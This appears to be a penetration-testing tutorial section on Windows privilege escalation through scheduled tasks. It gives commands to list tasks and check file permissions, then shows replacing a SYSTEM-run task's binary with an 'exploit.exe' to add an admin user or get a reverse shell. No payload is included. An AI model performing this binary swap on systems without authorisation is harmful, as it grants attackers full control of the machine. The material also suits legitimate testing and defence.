Scheduled Tasks

In order to leverage this approach to privilege escalation, we’re looking to understand what scheduled tasks are set up, when they’re next running and who the task runs as. We also need to understand if we can edit the file that the scheduled task runs because there’s our opportunity, where we’ll either add an admin user or try to get a reverse shell.

Get-ScheduledTask
# uses powershell to get scheduled tasks

schtasks /query /fo LIST /v
# lists all scheduled tasks, the list can be enormous so it might take a while to pick through.

icacls filename
# we want F permissions, so if the task runs as admin, we can edit it to escalate privileges when it runs. 

Then once we understand that the task runs as SYSTEM and we can edit the file it runs, we can replace the file.

This is as simple as:

move .\Documents\OriginalFile.exe binary.exe
move .\exploit.exe .\Documents\OriginalFile.exe

It’s important to remember that the scheduled task references the name of the original file and therefore needs to remain the same. Adding exploit.exe to the location that the scheduled task looks for ‘OriginalFile.exe’ would mean that the scheduled task can’t find the file it’s supposed to run.